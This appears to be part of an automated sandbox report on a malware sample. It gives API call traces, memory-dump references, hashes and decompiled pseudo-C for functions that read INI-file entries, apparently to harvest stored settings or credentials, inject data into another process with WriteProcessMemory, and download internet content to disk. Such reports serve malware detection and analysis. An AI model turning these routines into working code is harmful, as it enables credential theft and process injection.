0x004214a7
0x004214ad
0x004214b7
0x004214ca
0x004214e1
0x0042156a
0x0042156a
0x004214e7
0x004214f4
0x004214f4
0x0042150b
0x00000000
0x00421518
0x00421521
0x0042152e
0x0042152f
0x00421530
0x00421536
0x00421539
0x0042153d
0x00421544
0x00421549
0x0042154e
0x00000000
0x00421550
0x00421552
0x00421558
0x0042155d
0x00421563
0x00421565
0x00421565
0x00421563
0x0042154e
0x0042150b
0x004214e1
0x0042156e
0x0042156e
0x0042156e
0x00421570
0x00421570
0x00421570
0x00421570
0x00421573
0x0042157e
0x00000000
0x00000000
0x0042158d
0x00421592
0x00000000
0x00421580
0x00421580
0x00421581
0x00421586
0x00421460
0x00421408
0x004213ea
0x00421596
0x0042159f
0x0042159f
0x00000000
0x00421357
0x00421357
0x00421360
0x00421378
0x00421389
0x00421396
0x00421396
0x00421355

APIs

PathCombineW.SHLWAPI(?,?,?), ref: 00421344
HeapAlloc.KERNEL32(?,00000008,00020002,?,?), ref: 004213AC
GetPrivateProfileStringW.KERNEL32 ref: 004213D0
HeapAlloc.KERNEL32(?,00000008,00000C20,?,?), ref: 004213FE
StrStrIW.SHLWAPI(00000000,?,?,?), ref: 00421466
GetPrivateProfileStringW.KERNEL32 ref: 00421489
GetPrivateProfileIntW.KERNEL32 ref: 004214A7
GetPrivateProfileStringW.KERNEL32 ref: 004214D9
GetPrivateProfileStringW.KERNEL32 ref: 00421503
HeapFree.KERNEL32(?,00000000,00000000,?,?), ref: 0042159F

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfile$String$Heap$Alloc$CombineFreePath
String ID:
API String ID: 592523376-0
Opcode ID: 2c69fdd4e42fc8f800d36a2ff43062ee6b40b7dade9e2576a769f74d1d34e595
Instruction ID: d855f3331f6cb8f5a420997e68b03cc794227ae0a774f833c9fbfbd933c3f3fe
Opcode Fuzzy Hash: 2c69fdd4e42fc8f800d36a2ff43062ee6b40b7dade9e2576a769f74d1d34e595
Instruction Fuzzy Hash: 1661C5717043116BE720DB51EC45BBB73A9EBD8740F80442EFA45D72A0DB78EC8587AA

Uniqueness

Uniqueness Score: -1.00%

Function 00420D80, Relevance: 15.2, APIs: 10, Instructions: 159
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00420D80() {
				void* __ebx;
				void* __esi;
				WCHAR* _t34;
				long _t35;
				signed int _t37;
				void* _t46;
				WCHAR* _t48;
				void* _t57;
				WCHAR* _t60;
				WCHAR* _t61;
				WCHAR* _t78;
				WCHAR* _t86;
				intOrPtr _t89;
				void* _t90;
				void* _t91;

				_t34 = HeapAlloc( *0x42e6d4, 8, 0x20002);
				_t78 = _t34;
				 *(_t91 + 0x14) = _t78;
				if(_t78 == 0) {
					return _t34;
				}
				_t60 =  *(_t91 + 0xa0);
				_t35 = GetPrivateProfileStringW(0, 0, 0, _t78, 0xffff, _t60);
				if(_t35 == 0) {
					L22:
					return HeapFree( *0x42e6d4, 0, _t78);
				}
				_t37 = _t35 + 1;
				if(_t37 < 2 ||  *((short*)(_t78 + _t37 * 2 - 2)) != 0 ||  *((short*)(_t78 + _t37 * 2 - 4)) != 0) {
					goto L22;
				} else {
					_t90 = HeapAlloc( *0x42e6d4, 8, 0xc0c);
					if(_t90 == 0) {
						goto L22;
					} else {
						_t9 = _t90 + 0x5fa; // 0x5fa
						 *((intOrPtr*)(_t91 + 0x18)) = _t9;
						E00424100(0x65, _t91 + 0x60);
						E00424100(0x66, _t91 + 0x28);
						E00424100(0x67, _t91 + 0x1c);
						E00424100(0x68, _t91 + 0x4c);
						E00424100(0x69, _t91 + 0x38);
						L7:
						while(1) {
							if(StrStrIW(_t78, _t91 + 0x60) == 0) {
								_t48 = StrStrIW(_t78, _t91 + 0x28);
								if(_t48 == 0 && GetPrivateProfileStringW(_t78, _t91 + 0x2c, _t48, _t90, 0xff, _t60) != 0) {
									_t19 = _t90 + 0x1fe; // 0x1fe
									_t61 = _t19;
									if(GetPrivateProfileStringW(_t78, _t91 + 0x5c, 0, _t61, 0xff, _t60) != 0) {
										_t22 =  &(_t61[0xff]); // 0x3fc
										_t86 = _t22;
										_t76 = _t91 + 0x48;
										if(GetPrivateProfileStringW(_t78, _t91 + 0x48, 0, _t86, 0xff,  *(_t91 + 0xa0)) != 0) {
											_push(_t86);
											if(E00420BD0(_t76) > 0) {
												_t87 = _t91 + 0x78;
												E00424100(0x56, _t91 + 0x78);
												_push(_t90);
												_t25 =  &(_t61[0xff]); // 0x3fc
												_t88 =  *((intOrPtr*)(_t91 + 0x20));
												_push(_t61);
												_t57 = E00411D10(_t87, 0x307,  *((intOrPtr*)(_t91 + 0x20)), _t87);
												_t91 = _t91 + 0x10;
												if(_t57 > 0) {
													_t89 =  *((intOrPtr*)(_t91 + 0xa4));
													if(E00410D70(_t89, _t88, _t57) != 0) {
														 *((intOrPtr*)(_t89 + 4)) =  *((intOrPtr*)(_t89 + 4)) + 1;
													}
												}
											}
										}
									}
								}
							}
							_t46 = 0;
							goto L17;
							L18:
							if( *_t78 == 0) {
								HeapFree( *0x42e6d4, 0, _t90);
								_t78 =  *(_t91 + 0x14);
								goto L22;
							}
							_t46 = _t46 + 1;
							if(_t46 != 1) {
								do {
									goto L17;
								} while ( *((short*)(_t78 - 2)) != 0);
								goto L18;
							} else {
								_t60 =  *(_t91 + 0xa0);
								continue;
							}
							L17:
							_t78 =  &(_t78[1]);
						}
					}
				}
			}

0x00420d9d
0x00420d9f
0x00420da1
0x00420da7
0x00420f8a
0x00420f8a
0x00420dad
0x00420dc1
0x00420dc9
0x00420f70
0x00000000
0x00420f7a
0x00420dcf
0x00420dd3
0x00000000
0x00420df1
0x00420e01
0x00420e05
0x00000000
0x00420e0b
0x00420e0b
0x00420e1a
0x00420e1e
0x00420e2c
0x00420e3a
0x00420e48
0x00420e56
0x00000000
0x00420e60
0x00420e70
0x00420e7c
0x00420e80
0x00420ea8
0x00420ea8
0x00420ebf
0x00420ece
0x00420ece
0x00420ed7
0x00420ee5
0x00420ee7
0x00420eef
0x00420ef1
0x00420efa
0x00420eff
0x00420f00
0x00420f09
0x00420f0d
0x00420f14
0x00420f19
0x00420f1e
0x00420f22
0x00420f33
0x00420f35
0x00420f35
0x00420f33
0x00420f1e
0x00420eef
0x00420ee5
0x00420ebf
0x00420e80
0x00420f38
0x00420f38
0x00420f44
0x00420f48
0x00420f66
0x00420f6c
0x00000000
0x00420f6c
0x00420f4a
0x00420f4e
0x00420f3a
0x00000000
0x00000000
0x00000000
0x00420f50
0x00420f50
0x00000000
0x00420f50
0x00420f3a
0x00420f3a
0x00420f3d
0x00420e60
0x00420e05

APIs

HeapAlloc.KERNEL32(?,00000008,00020002,?,?,74B04770), ref: 00420D9D
GetPrivateProfileStringW.KERNEL32 ref: 00420DC1
HeapAlloc.KERNEL32(?,00000008,00000C0C,?,?,74B04770), ref: 00420DFF
StrStrIW.SHLWAPI(00000000,?,?,?,74B04770), ref: 00420E6C
StrStrIW.SHLWAPI(-00000002,?,?,?,74B04770), ref: 00420E7C
GetPrivateProfileStringW.KERNEL32 ref: 00420E94
GetPrivateProfileStringW.KERNEL32 ref: 00420EB7
GetPrivateProfileStringW.KERNEL32 ref: 00420EDD
HeapFree.KERNEL32(?,00000000,00000000,?,?,74B04770), ref: 00420F66
HeapFree.KERNEL32(?,00000000,00000000,?,?,74B04770), ref: 00420F7A

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapPrivateProfileString$AllocFree
String ID:
API String ID: 1207226462-0
Opcode ID: addb881749b7c9fc9b4f24b4024574d71cf3026cf6da6a1f484fd44322e491e0
Instruction ID: 5980705cce0149dfb77786b408ef8ebd71a78e5ab16da2f79c6f8b9a721692b7
Opcode Fuzzy Hash: addb881749b7c9fc9b4f24b4024574d71cf3026cf6da6a1f484fd44322e491e0
Instruction Fuzzy Hash: E151F7317403259BE7309B51ED41F7B77ECEB98744F81442EBA00A7291DBB8AC42C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 0041CE60, Relevance: 15.1, APIs: 10, Instructions: 142
injectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041CE60(void* __esi, void _a4, void _a8) {
				void _v4;
				char _v5;
				intOrPtr _v8;
				intOrPtr _t32;
				void* _t50;
				void* _t52;
				void _t56;
				void _t57;
				void* _t73;
				void* _t75;
				void* _t79;

				_t79 = __esi;
				_t32 = E00417150( *0x42e90c, __esi);
				_v8 = _t32;
				if(_t32 == 0) {
					L17:
					return 0;
				} else {
					_v5 = 0;
					if(DuplicateHandle(0xffffffff, _a4, __esi,  &_a4, 0, 0, 2) == 0) {
						_v5 = 1;
					}
					_a8 = _a8 |  *0x42e8f8 & 0x00000014;
					if(WriteProcessMemory(_t79, 0x42e8f8 -  *0x42e90c + _v4,  &_a8, 4, 0) == 0) {
						_v5 = _v5 + 1;
					}
					if(WriteProcessMemory(_t79, 0x42e90c -  *0x42e90c + _v4,  &_v4, 4, 0) == 0) {
						_v5 = _v5 + 1;
					}
					_t56 = _v4;
					_t73 = 0x42edbc -  *0x42e90c;
					if(DuplicateHandle(0xffffffff,  *0x42edbc, _t79,  &_a4, 0, 0, 2) == 0) {
						L10:
						_v5 = _v5 + 1;
					} else {
						_t52 = WriteProcessMemory(_t79, _t73 + _t56,  &_a4, 4, 0);
						if(_t52 == 0) {
							DuplicateHandle(_t79, _a4, _t52, _t52, _t52, _t52, 1);
							goto L10;
						}
					}
					_t57 = _v4;
					_t75 = 0x42edc0 -  *0x42e90c;
					if(DuplicateHandle(0xffffffff,  *0x42edc0, _t79,  &_a4, 0, 0, 2) == 0) {
						L14:
						_v5 = _v5 + 1;
					} else {
						_t50 = WriteProcessMemory(_t79, _t75 + _t57,  &_a4, 4, 0);
						if(_t50 == 0) {
							DuplicateHandle(_t79, _a4, _t50, _t50, _t50, _t50, 1);
							goto L14;
						}
					}
					if(_v5 == 0) {
						return _v4;
					} else {
						VirtualFreeEx(_t79, _v4, 0, 0x8000);
						goto L17;
					}
				}
			}

0x0041ce60
0x0041ce69
0x0041ce6e
0x0041ce74
0x0041cfc4
0x0041cfc9
0x0041ce7a
0x0041ce96
0x0041ce9f
0x0041cea1
0x0041cea1
0x0041cece
0x0041ced7
0x0041ced9
0x0041ced9
0x0041cefb
0x0041cefd
0x0041cefd
0x0041cf07
0x0041cf1d
0x0041cf29
0x0041cf50
0x0041cf50
0x0041cf2b
0x0041cf38
0x0041cf40
0x0041cf4e
0x00000000
0x0041cf4e
0x0041cf40
0x0041cf5a
0x0041cf70
0x0041cf7c
0x0041cfa3
0x0041cfa3
0x0041cf7e
0x0041cf8b
0x0041cf93
0x0041cfa1
0x00000000
0x0041cfa1
0x0041cf93
0x0041cfaf
0x0041cfd3
0x0041cfb1
0x0041cfbe
0x00000000
0x0041cfbe
0x0041cfaf

APIs

Part of subcall function 00417150: IsBadReadPtr.KERNEL32 ref: 0041716C

DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002,00000000,00000000,00000000,00000000,?,00000010), ref: 0041CE9B
WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,00000010), ref: 0041CED3
WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,00000010), ref: 0041CEF7
DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002,?,00000010), ref: 0041CF25
WriteProcessMemory.KERNEL32(00000000,000004B0,?,00000004,00000000,?,00000010), ref: 0041CF38
DuplicateHandle.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000001,?,00000010), ref: 0041CF4E
DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 0041CF78
WriteProcessMemory.KERNEL32(00000000,000004B4,?,00000004,00000000), ref: 0041CF8B
DuplicateHandle.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 0041CFA1
VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000), ref: 0041CFBE

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: DuplicateHandle$MemoryProcessWrite$FreeReadVirtual
String ID:
API String ID: 2818436396-0
Opcode ID: 68563b0517ee324b51e3d9bdb349deb0da882b423a277850e86446d2d9cf373a
Instruction ID: 8686a2b7cfb8014808a3df94d39974e96531dd4150d5ccc0fcdd04c1316837c8
Opcode Fuzzy Hash: 68563b0517ee324b51e3d9bdb349deb0da882b423a277850e86446d2d9cf373a
Instruction Fuzzy Hash: 5241E3B23483417AE310DB51CC85FAB7BADEB89B04F408619F744A62D0D774E94AC76E

Uniqueness

Uniqueness Score: -1.00%

Function 004132A0, Relevance: 15.1, APIs: 10, Instructions: 92
filememorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004132A0(void* _a4, WCHAR* _a8, void* _a16) {
				intOrPtr _v4;
				WCHAR* _v8;
				long _v12;
				long _v20;
				intOrPtr _v24;
				long _v28;
				void* _t21;
				long _t24;
				long _t27;
				long _t29;
				intOrPtr _t33;
				void* _t37;
				void* _t39;
				WCHAR* _t40;

				_t40 = _a8;
				_t29 = 0;
				_t39 = CreateFileW(_t40, 0x40000000, 1, 0, 2, 0x80, 0);
				if(_t39 == 0xffffffff) {
					L15:
					return _t29;
				}
				_t37 = HeapAlloc( *0x42e6d4, 8, 0x1004);
				if(_t37 == 0) {
					L13:
					CloseHandle(_t39);
					if(_t29 == 0) {
						SetFileAttributesW(_t40, 0x80);
						DeleteFileW(_t40);
					}
					goto L15;
				}
				_v8 = 0;
				while(1) {
					_t21 = _a16;
					if(_t21 != 0 && WaitForSingleObject(_t21, 0) != 0x102) {
						break;
					}
					if(InternetReadFile(_a4, _t37, 0x1000,  &_v12) == 0) {
						break;
					}
					_t24 = _v28;
					if(_t24 == 0) {
						FlushFileBuffers(_t39);
						_t29 = 1;
						break;
					}
					if(WriteFile(_t39, _t37, _t24,  &_v20, 0) == 0) {
						break;
					}
					_t27 = _v28;
					if(_t27 != _v20) {
						break;
					}
					_t33 = _v24 + _t27;
					_v24 = _t33;
					if(_t33 <= _v4) {
						continue;
					}
					break;
				}
				HeapFree( *0x42e6d4, 0, _t37);
				_t40 = _v8;
				goto L13;
			}

0x004132a5
0x004132bd
0x004132c5
0x004132ca
0x004133a4
0x004133aa
0x004133aa
0x004132e4
0x004132e8
0x00413383
0x00413384
0x0041338d
0x00413395
0x0041339c
0x0041339c
0x00000000
0x0041338d
0x004132f4
0x00413300
0x00413300
0x00413306
0x00000000
0x00000000
0x00413330
0x00000000
0x00000000
0x00413332
0x00413338
0x00413367
0x0041336d
0x00000000
0x0041336d
0x00413348
0x00000000
0x00000000
0x0041334a
0x00413352
0x00000000
0x00000000
0x00413358
0x0041335a
0x00413362
0x00000000
0x00000000
0x00000000
0x00413364
0x00413379
0x0041337f
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,00000000,?,?,?,00000001), ref: 004132BF
HeapAlloc.KERNEL32(?,00000008,00001004,00000000,?,00000001,?,?,?,?,?,?,?,74B5F750), ref: 004132DE
WaitForSingleObject.KERNEL32(?,00000000), ref: 0041330B
InternetReadFile.WININET(?,00000000,00001000,?), ref: 00413328
WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00413344
FlushFileBuffers.KERNEL32(00000000), ref: 00413367
HeapFree.KERNEL32(?,00000000,00000000), ref: 00413379
CloseHandle.KERNEL32(00000000,?,00000001,?,?,?,?,?,?,?,74B5F750), ref: 00413384
SetFileAttributesW.KERNEL32(?,00000080,00000001,?,?,?,?,?,?,?,74B5F750), ref: 00413395
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,74B5F750), ref: 0041339C

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Heap$AllocAttributesBuffersCloseCreateDeleteFlushFreeHandleInternetObjectReadSingleWaitWrite
String ID:
API String ID: 4245752811-0
Opcode ID: 14b8162236a24ff8483f2aa182ffc03e9925cc41ce76a17b16b47d800a074eff
Instruction ID: a6005eaa3e22a7003f1125e1fc2b81a1038083ec1a350cbc8dc9facc59a8eaf6
Opcode Fuzzy Hash: 14b8162236a24ff8483f2aa182ffc03e9925cc41ce76a17b16b47d800a074eff
Instruction Fuzzy Hash: 9831B130244305AFD3209F25DD49F9B77A8BB84B11F400529FAA1E72E0DB74EA49C76E

Uniqueness

Uniqueness Score: -1.00%

Function 0041B280, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 273
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041B280(void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				char _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				char _v57;
				void* _v64;
				char _v69;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t52;
				void* _t57;
				void* _t63;
				void* _t67;
				void* _t68;
				void* _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t79;
				void* _t83;
				void* _t84;
				void* _t88;
				void* _t90;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t98;
				void* _t102;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t117;
				intOrPtr _t118;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t131;
				void* _t132;

				_t52 = E0040C330();
				_v56 = _t52;
				if(_t52 == 0) {
					L13:
					__eflags = 0;
					return 0;
				} else {
					_t117 = E00418BD0(2, 0x20000000, _t52);
					if(_t117 == 0) {
						L12:
						HeapFree( *0x42e6d4, 0, _v56);
						_t57 =  *0x42d420; // 0x0
						ReleaseMutex(_t57);
						CloseHandle(_t57);
						goto L13;
					} else {
						_t88 = E00418C20(_t117);
						_v40 = _t88;
						if(_t88 == 0) {
							goto L12;
						} else {
							_t118 =  *((intOrPtr*)(_t117 + 0xc));
							_v57 = 0;
							if(E0041A630(_t60, _t118) != 0 && _t118 != 0) {
								_t67 = HeapAlloc( *0x42e6d4, 8, _t118 + 4);
								_v48 = _t67;
								if(_t67 == 0) {
									goto L70;
								} else {
									_t121 = _t88;
									_v52 = _t67;
									while(1) {
										L7:
										_t7 = _t121 + 1; // 0x1
										_t108 = _t7;
										_t94 = 0;
										_v44 = _t108;
										_t68 = _t108;
										L8:
										while(1) {
											if( *((char*)(_t68 - 1)) != 0) {
												L11:
												_t68 = _t68 + 1;
												continue;
											}
											if( *_t68 == 0) {
												_t90 = 0;
											} else {
												_t94 = _t94 + 1;
												if(_t94 == 1) {
													_t90 = _t68;
												} else {
													goto L11;
												}
											}
											_t95 = 0;
											__eflags = 0;
											_t69 = _t108;
											while(1) {
												__eflags =  *((char*)(_t69 - 1));
												if( *((char*)(_t69 - 1)) != 0) {
													goto L20;
												}
												L18:
												__eflags =  *_t69;
												if( *_t69 == 0) {
													_t131 = 0;
												} else {
													_t95 = _t95 + 1;
													__eflags = _t95 - 2;
													if(_t95 == 2) {
														_t131 = _t69;
													} else {
														goto L20;
													}
												}
												_t96 = _a4;
												_t70 = 0;
												_v36 = 0x2a3f;
												_v32 = _t96;
												__eflags = _t96;
												if(_t96 != 0) {
													__eflags =  *_t96;
													if( *_t96 != 0) {
														do {
															_t70 = _t70 + 1;
															__eflags =  *((char*)(_t70 + _t96));
														} while ( *((char*)(_t70 + _t96)) != 0);
													}
												}
												_v28 = _t70;
												_t71 = 0;
												_v24 = _t121;
												__eflags = _t121;
												if(_t121 != 0) {
													__eflags =  *_t121;
													if( *_t121 != 0) {
														do {
															_t71 = _t71 + 1;
															__eflags =  *((char*)(_t71 + _t121));
														} while ( *((char*)(_t71 + _t121)) != 0);
													}
												}
												_v20 = _t71;
												_v8 = 7;
												_t72 = E00412090( &_v36);
												__eflags = _t72;
												if(_t72 == 0) {
													L34:
													_t73 = 0;
													__eflags = _t121;
													if(_t121 != 0) {
														__eflags =  *_t121;
														if( *_t121 != 0) {
															do {
																_t73 = _t73 + 1;
																__eflags =  *((char*)(_t73 + _t121));
															} while ( *((char*)(_t73 + _t121)) != 0);
														}
													}
													_t109 = _t73;
													__eflags = _t73 - 0xffffffff;
													if(_t73 == 0xffffffff) {
														_t109 = 0;
														__eflags = _t121;
														if(_t121 != 0) {
															__eflags =  *_t121;
															if( *_t121 != 0) {
																do {
																	_t109 = _t109 + 1;
																	__eflags =  *((char*)(_t109 + _t121));
																} while ( *((char*)(_t109 + _t121)) != 0);
															}
														}
													}
													_t122 = _v52;
													_t74 = E00410820(_t122, _t121, _t109);
													 *((char*)(_t109 + _t122)) = 0;
													_t123 = _t122 + _t74 + 1;
													_t75 = 0;
													__eflags = _t90;
													if(_t90 != 0) {
														__eflags =  *_t90;
														if( *_t90 != 0) {
															do {
																_t75 = _t75 + 1;
																__eflags =  *((char*)(_t75 + _t90));
															} while ( *((char*)(_t75 + _t90)) != 0);
														}
													}
													_t110 = _t75;
													__eflags = _t75 - 0xffffffff;
													if(_t75 == 0xffffffff) {
														_t110 = 0;
														__eflags = _t90;
														if(_t90 != 0) {
															__eflags =  *_t90;
															if( *_t90 != 0) {
																do {
																	_t110 = _t110 + 1;
																	__eflags =  *((char*)(_t110 + _t90));
																} while ( *((char*)(_t110 + _t90)) != 0);
															}
														}
													}
													_t76 = E00410820(_t123, _t90, _t110);
													 *((char*)(_t110 + _t123)) = 0;
													_t124 = _t123 + _t76 + 1;
													_t77 = 0;
													__eflags = _t131;
													if(_t131 != 0) {
														__eflags =  *_t131;
														if( *_t131 != 0) {
															do {
																_t77 = _t77 + 1;
																__eflags =  *((char*)(_t77 + _t131));
															} while ( *((char*)(_t77 + _t131)) != 0);
														}
													}
													_t111 = _t77;
													__eflags = _t77 - 0xffffffff;
													if(_t77 == 0xffffffff) {
														_t102 = 0;
														__eflags = _t131;
														if(_t131 != 0) {
															__eflags =  *_t131;
															if( *_t131 != 0) {
																do {
																	_t102 = _t102 + 1;
																	__eflags =  *((char*)(_t102 + _t131));
																} while ( *((char*)(_t102 + _t131)) != 0);
															}
														}
														_t111 = _t102;
													}
													_t98 = _t124 + E00410820(_t124, _t131, _t111) + 1;
													 *((char*)(_t111 + _t124)) = 0;
													_v64 = _t98;
													 *_t98 = 0;
												} else {
													_t83 = E004122D0(_a8, _t90);
													__eflags = _t83;
													if(_t83 == 0) {
														goto L34;
													} else {
														_t84 = E004122D0(_a12, _t131);
														__eflags = _t84;
														if(_t84 == 0) {
															goto L34;
														} else {
															_t98 = _v52;
															_v57 = 1;
														}
													}
												}
												_t121 = _v44;
												_t79 = 0;
												__eflags = 0;
												while(1) {
													__eflags =  *((char*)(_t121 - 1));
													if( *((char*)(_t121 - 1)) != 0) {
														goto L64;
													}
													L62:
													__eflags =  *_t121;
													if( *_t121 != 0) {
														_t79 = _t79 + 1;
														__eflags = _t79 - 3;
														if(_t79 == 3) {
															goto L7;
														} else {
															goto L64;
														}
													}
													__eflags = _v57 - 1;
													_t132 = _v48;
													if(_v57 == 1) {
														__eflags = _t98 - _t132;
														if(_t98 == _t132) {
															_t98 = _t98 - 1;
															__eflags = _t98;
														}
														_t101 = _t98 - _t132 + 1;
														__eflags = _t98 - _t132 + 1;
														_v69 = E00418B90(2, _t98 - _t132 + 1,  &_v56, _t132, _t101);
													}
													HeapFree( *0x42e6d4, 0, _t132);
													_t88 = _v40;
													goto L71;
													L64:
													_t121 = _t121 + 1;
													__eflags =  *((char*)(_t121 - 1));
													if( *((char*)(_t121 - 1)) != 0) {
														goto L64;
													}
													goto L62;
												}
												L20:
												_t69 = _t69 + 1;
												__eflags =  *((char*)(_t69 - 1));
												if( *((char*)(_t69 - 1)) != 0) {
													goto L20;
												}
												goto L18;
											}
										}
									}
								}
							}
							L71:
							HeapFree( *0x42e6d4, 0, _t88);
							__eflags = _v57;
							_t63 = _v56;
							if(_v57 == 0) {
								__eflags = _t63;
								if(_t63 != 0) {
									HeapFree( *0x42e6d4, 0, _t63);
								}
								_t63 = 0;
								__eflags = 0;
							}
							return E0040C3F0(_t63);
						}
					}
				}
			}

0x0041b28c
0x0041b291
0x0041b297
0x0041b34f
0x0041b34f
0x0041b357
0x0041b29d
0x0041b2ae
0x0041b2b2
0x0041b326
0x0041b334
0x0041b33a
0x0041b342
0x0041b349
0x00000000
0x0041b2b4
0x0041b2b9
0x0041b2bb
0x0041b2c1
0x00000000
0x0041b2c3
0x0041b2c3
0x0041b2c8
0x0041b2d4
0x0041b2ef
0x0041b2f5
0x0041b2fb
0x00000000
0x0041b301
0x0041b301
0x0041b303
0x0041b307
0x0041b307
0x0041b307
0x0041b307
0x0041b30a
0x0041b30c
0x0041b310
0x00000000
0x0041b312
0x0041b316
0x0041b323
0x0041b323
0x00000000
0x0041b323
0x0041b31b
0x0041b35a
0x0041b31d
0x0041b31d
0x0041b321
0x0041b35e
0x00000000
0x00000000
0x00000000
0x0041b321
0x0041b360
0x0041b360
0x0041b362
0x0041b364
0x0041b364
0x0041b368
0x00000000
0x00000000
0x0041b36a
0x0041b36a
0x0041b36d
0x0041b378
0x0041b36f
0x0041b36f
0x0041b370
0x0041b373
0x0041b37c
0x00000000
0x00000000
0x00000000
0x0041b373
0x0041b37e
0x0041b381
0x0041b383
0x0041b38a
0x0041b38e
0x0041b390
0x0041b392
0x0041b394
0x0041b396
0x0041b396
0x0041b397
0x0041b397
0x0041b396
0x0041b394
0x0041b39d
0x0041b3a1
0x0041b3a3
0x0041b3a7
0x0041b3a9
0x0041b3ab
0x0041b3ad
0x0041b3b0
0x0041b3b0
0x0041b3b1
0x0041b3b1
0x0041b3b0
0x0041b3ad
0x0041b3bb
0x0041b3bf
0x0041b3c7
0x0041b3cc
0x0041b3ce
0x0041b3fa
0x0041b3fa
0x0041b3fc
0x0041b3fe
0x0041b400
0x0041b402
0x0041b404
0x0041b404
0x0041b405
0x0041b405
0x0041b404
0x0041b402
0x0041b40b
0x0041b40d
0x0041b410
0x0041b412
0x0041b414
0x0041b416
0x0041b418
0x0041b41a
0x0041b420
0x0041b420
0x0041b421
0x0041b421
0x0041b420
0x0041b41a
0x0041b416
0x0041b429
0x0041b42e
0x0041b433
0x0041b437
0x0041b43b
0x0041b43d
0x0041b43f
0x0041b441
0x0041b443
0x0041b445
0x0041b445
0x0041b446
0x0041b446
0x0041b445
0x0041b443
0x0041b44c
0x0041b44e
0x0041b451
0x0041b453
0x0041b455
0x0041b457
0x0041b459
0x0041b45b
0x0041b460
0x0041b460
0x0041b461
0x0041b461
0x0041b460
0x0041b45b
0x0041b457
0x0041b46a
0x0041b46f
0x0041b473
0x0041b477
0x0041b479
0x0041b47b
0x0041b47d
0x0041b47f
0x0041b481
0x0041b481
0x0041b482
0x0041b482
0x0041b481
0x0041b47f
0x0041b488
0x0041b48a
0x0041b48d
0x0041b48f
0x0041b491
0x0041b493
0x0041b495
0x0041b497
0x0041b4a0
0x0041b4a0
0x0041b4a1
0x0041b4a1
0x0041b4a0
0x0041b497
0x0041b4a7
0x0041b4a7
0x0041b4b1
0x0041b4b5
0x0041b4b9
0x0041b4bd
0x0041b3d0
0x0041b3d5
0x0041b3da
0x0041b3dc
0x00000000
0x0041b3de
0x0041b3e3
0x0041b3e8
0x0041b3ea
0x00000000
0x0041b3ec
0x0041b3ec
0x0041b3f0
0x0041b3f0
0x0041b3ea
0x0041b3dc
0x0041b4c0
0x0041b4c4
0x0041b4c4
0x0041b4c6
0x0041b4c6
0x0041b4ca
0x00000000
0x00000000
0x0041b4cc
0x0041b4cc
0x0041b4cf
0x0041b4d1
0x0041b4d2
0x0041b4d5
0x00000000
0x00000000
0x00000000
0x00000000
0x0041b4d5
0x0041b4de
0x0041b4e3
0x0041b4e7
0x0041b4e9
0x0041b4eb
0x0041b4ed
0x0041b4ed
0x0041b4ed
0x0041b4f0
0x0041b4f0
0x0041b502
0x0041b502
0x0041b516
0x0041b518
0x00000000
0x0041b4db
0x0041b4db
0x0041b4c6
0x0041b4ca
0x00000000
0x00000000
0x00000000
0x0041b4ca
0x0041b375
0x0041b375
0x0041b364
0x0041b368
0x00000000
0x00000000
0x00000000
0x0041b368
0x0041b364
0x0041b312
0x0041b307
0x0041b2fb
0x0041b524
0x0041b52e
0x0041b530
0x0041b535
0x0041b539
0x0041b53b
0x0041b53d
0x0041b548
0x0041b548
0x0041b54a
0x0041b54a
0x0041b54a
0x0041b558
